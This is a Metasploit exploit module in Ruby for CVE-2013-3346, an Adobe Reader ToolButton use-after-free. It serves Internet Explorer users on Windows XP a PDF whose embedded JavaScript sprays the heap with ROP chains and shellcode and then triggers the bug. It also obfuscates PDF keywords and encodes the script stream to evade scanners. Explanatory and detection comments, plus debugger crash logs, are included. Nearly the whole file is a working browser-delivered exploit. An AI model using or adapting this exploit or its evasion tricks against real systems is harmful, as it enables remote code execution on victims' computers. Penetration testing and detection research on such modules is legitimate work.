
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_toolbutton.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Browser-delivered exploit module for CVE-2013-3346 (Adobe Reader ToolButton
# use-after-free, see 'References'). The BrowserExploitServer mixin checks the
# client against 'BrowserRequirements' and calls on_request_exploit, which
# serves the PDF assembled by make_pdf. The Reader version gate is inside the
# PDF's JavaScript (make_js), not in the HTTP layer.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  # Module metadata. Delivery is limited to IE on Windows XP by
  # 'BrowserRequirements'; the single target carries no options because every
  # version-specific value is chosen client-side in make_js.
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Reader ToolButton Use After Free",
      'Description'    => %q{
This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6
and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where
the cEnable callback can be used to early free the object memory. Later use of the object
allows triggering the use after free condition. This module has been tested successfully
on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in
November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order
to exploit Adobe Reader 9 the fileformat version of the exploit can be used.
},
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Soroush Dalili', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3346' ],
          [ 'OSVDB', '96745' ],
          [ 'ZDI', '13-212' ],
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],
          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      # Client fingerprint (from script or header data) the mixin requires
      # before routing a request to on_request_exploit (mixin behaviour, not
      # visible in this file).
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => OperatingSystems::Match::WINDOWS_XP,
          :ua_name => Msf::HttpClients::IE
        },
      'Targets'        =>
        [
          [ 'Windows XP / IE / Adobe Reader 10/11', { } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2013-08-08',
      'DefaultTarget'  => 0))

  end

  # Callback from BrowserExploitServer for a client that satisfied
  # 'BrowserRequirements'.
  # cli         - the client connection the response is written to
  # request     - the HTTP request; only its URI is logged here
  # target_info - the client fingerprint, passed through to get_payload
  # Sends the generated PDF with Content-Type application/pdf and
  # Pragma: no-cache; returns whatever send_response returns.
  def on_request_exploit(cli, request, target_info)
    print_status("request: #{request.uri}")
    js_data = make_js(cli, target_info)
    # Create the pdf
    pdf = make_pdf(js_data)
    print_status("Sending PDF...")
    send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })
  end

  # Builds the JavaScript that the PDF's /OpenAction runs (object 4 in make_pdf).
  # generate_rop_payload and get_payload come from the exploit mixins and are
  # not visible in this file; their output is escaped for JavaScript unescape()
  # by Rex::Text.to_unescape and interpolated into the script, so the script is
  # regenerated for every request.
  # The script gates on app.viewerVersion: only 10.0..10.106 and 11.0..11.002
  # pick values and continue; any other version sets vulnerable = false and the
  # trigger (the nested app.addToolButton / cEnable callbacks) is never reached.
  # Returns the script as a String.
  # Detection note: once the stream is decoded (see make_pdf), the
  # addToolButton/removeToolButton pair driven from a cEnable callback and the
  # unescape("%u0c0c") spray are the stable indicators in the script text.
  def make_js(cli, target_info)
    # CreateFileMappingA + MapViewOfFile + memcpy rop chain
    rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
    rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
    escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))

    js = %Q|
function heapSpray(str, str_addr, r_addr) {
var aaa = unescape("%u0c0c");
aaa += aaa;
while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;
var i1 = r_addr - 0x24;
var bbb = aaa.substring(0, i1 / 2);
var sa = str_addr;
while (sa.length < (0x0c0c - r_addr)) sa += sa;
bbb += sa;
bbb += aaa;
var i11 = 0x0c0c - 0x24;
bbb = bbb.substring(0, i11 / 2);
bbb += str;
bbb += aaa;
var i2 = 0x4000 + 0xc000;
var ccc = bbb.substring(0, i2 / 2);
while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;
var i3 = (0x1020 - 0x08) / 2;
var ddd = ccc.substring(0, 0x80000 - i3);
var eee = new Array();
for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
return;
}
var shellcode = unescape("#{escaped_payload}");
var executable = "";
var rop10 = unescape("#{rop_10}");
var rop11 = unescape("#{rop_11}");
var r11 = false;
var vulnerable = true;

var obj_size;
var rop;
var ret_addr;
var rop_addr;
var r_addr;

if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
obj_size = 0x360 + 0x1c;
rop = rop10;
rop_addr = unescape("%u08e4%u0c0c");
r_addr = 0x08e4;
ret_addr = unescape("%ua8df%u4a82");
} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
r11 = true;
obj_size = 0x370;
rop = rop11;
rop_addr = unescape("%u08a8%u0c0c");
r_addr = 0x08a8;
ret_addr = unescape("%u8003%u4a84");
} else {
vulnerable = false;
}

if (vulnerable) {
var payload = rop + shellcode;
heapSpray(payload, ret_addr, r_addr);

var part1 = "";
if (!r11) {
for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");
}
part1 += rop_addr;
var part2 = "";
var part2_len = obj_size - part1.length * 2;
for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");
var arr = new Array();

removeButtonFunc = function () {
app.removeToolButton({
cName: "evil"
});

for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
}

addButtonFunc = function () {
app.addToolButton({
cName: "xxx",
cExec: "1",
cEnable: "removeButtonFunc();"
});
}

app.addToolButton({
cName: "evil",
cExec: "1",
cEnable: "addButtonFunc();"
});
}
|

    js
  end

  # Returns a String of `count` random bytes in the range 0x80..0xFF. Used by
  # make_pdf for the binary comment line that follows the %PDF header.
  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  # Object header "<id> 0 obj \n" (generation 0) for PDF object `id`.
  def io_def(id)
    "%d 0 obj \n" % id
  end

  # Indirect reference "<id> 0 R" to PDF object `id`.
  def io_ref(id)
    "%d 0 R" % id
  end


  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  # Rewrites roughly half of the letters in `str` as PDF #xx hex escapes
  # (rand(2) == 0 per character whose upcase sorts between 'A' and 'Z');
  # everything else is copied as-is. This is the name-obfuscation technique
  # from the linked post, meant to defeat byte-exact matching on keywords such
  # as /JavaScript; a scanner should normalise #xx escapes in names before
  # matching. Output differs between calls. The commented-out `return str`
  # looks like a debugging toggle that bypasses the obfuscation.
  # NOTE(review): only the first byte of c is emitted ("C*")[0], so a
  # multi-byte character whose upcase sorts between 'A' and 'Z' (e.g. "ß",
  # which upcases to "SS") would be truncated; every caller here passes ASCII.
  def n_obfu(str)
    #return str
    result = ""
    str.scan(/./u) do |c|
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end


  # Encodes each byte of `str` as two lowercase hex digits, separated by 1-3
  # random spaces (none before the first byte), and appends the ASCIIHexDecode
  # end-of-data marker ">". Returns the encoded String. The random spacing is
  # intended to vary the on-wire bytes without changing the decoded stream
  # (the ASCIIHexDecode filter skips whitespace).
  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end


  # Assembles the PDF served to the client, with `js` as the /OpenAction script.
  # Object layout: 1 catalog, 2 pages, 3 page, 4 JavaScript action, 5 script
  # stream, 6 AcroForm, 7 XFA stream, then the xref table and trailer.
  # Names/keywords are passed through n_obfu and the script stream is
  # ASCIIHex-encoded with random whitespace and then deflated, so the bytes
  # differ on every call; to recover the script apply FlateDecode and then
  # ASCIIHexDecode, in the order given by /Filter. Returns the PDF as a String.
  def make_pdf(js)
    # byte offset of each object, in object-number order, for the xref table
    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    pdf << "%" << random_non_ascii_string(4) << eol

    # Each "xref << pdf.length" below is taken immediately before the object's
    # "N 0 obj" header, since xref entries must be offsets from the file start.
    # NOTE(review): String#length counts characters; after the non-ASCII
    # comment line above the buffer should be ASCII-8BIT so length equals
    # bytesize -- confirm if the header ever changes.
    # catalog
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<<") << eol
    pdf << n_obfu("/Pages ") << io_ref(2) << eol
    pdf << n_obfu("/Type /Catalog") << eol
    pdf << n_obfu("/OpenAction ") << io_ref(4) << eol
    # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load
    pdf << n_obfu("/AcroForm ") << io_ref(6) << eol
    pdf << n_obfu(">>") << eol
    pdf << endobj

    # pages array
    xref << pdf.length
    pdf << io_def(2) << n_obfu("<<") << eol
    pdf << n_obfu("/Kids [") << io_ref(3) << "]" << eol
    pdf << n_obfu("/Count 1") << eol
    pdf << n_obfu("/Type /Pages") << eol
    pdf << n_obfu(">>") << eol
    pdf << endobj

    # page 1
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<<") << eol
    pdf << n_obfu("/Parent ") << io_ref(2) << eol
    pdf << n_obfu("/Type /Page") << eol
    pdf << n_obfu(">>") << eol # end obj dict
    pdf << endobj

    # js action (referenced from the catalog's /OpenAction)
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<<")
    pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(5)
    pdf << n_obfu(">>") << eol
    pdf << endobj

    # js stream: /Length is the deflated size
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(5) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    ###
    # The following form related data is required to get icucnv36.dll / icucnv40.dll to load
    ###

    # form object
    xref << pdf.length
    pdf << io_def(6)
    pdf << n_obfu("<</XFA ") << io_ref(7) << n_obfu(">>") << eol
    pdf << endobj

    # form stream (plain ASCII, so xfa.length is also its byte length)
    xfa = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
EOF

    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Length %s>>" % xfa.length) << eol
    pdf << "stream" << eol
    pdf << xfa << eol
    pdf << "endstream" << eol
    pdf << endobj

    ###
    # end form stuff for icucnv36.dll / icucnv40.dll
    ###


    # trailing stuff: xref table with the free entry 0 followed by one
    # in-use entry per object, then the trailer and startxref
    xrefPosition = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    # /Size is the object count plus one for entry 0
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

    pdf << "startxref" << eol
    pdf << xrefPosition.to_s() << eol

    pdf << "%%EOF" << eol
    pdf
  end
end
=begin
* crash Adobe Reader 10.1.4
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001
eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213
AcroRd32_60000000!PDFLTerm+0xbb7cd:
604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????
* crash Adobe Reader 11.0.2
(940.d70): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -
eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000
eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213
AcroRd32_60000000!DllCanUnloadNow+0x1493ae:
60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????
=end